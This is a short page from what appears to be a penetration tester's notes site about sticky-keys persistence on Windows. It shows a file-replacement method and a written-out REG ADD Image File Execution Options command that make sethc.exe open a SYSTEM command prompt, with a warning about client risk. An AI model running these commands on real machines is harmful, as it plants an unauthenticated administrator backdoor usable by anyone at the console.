Sticky Keys

Copying sethc.exe

Once you already have administrative access you can easily install sticky keys based persistence by performing the following:

Make a copy of sethc.exe
Copy cmd.exe to C:\Windows\System32\sethc.exe
Reboot and hit shift 5 times!

Registry Key

Another method is by leveraging registry keys running the following command:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

If you use sticky keys for persistence any user can hit shift five times and get command prompt running as SYSTEM. BE CAREFUL!!! You shouldn’t introduce risks to your clients

Resources:

Title	URL
place	holder

Also Check Out:

PLACEHOLDER

The Void 🌌

Explorer

Sticky Keys

Copying sethc.exe

Registry Key

Resources:

Also Check Out:

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Table of Contents

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer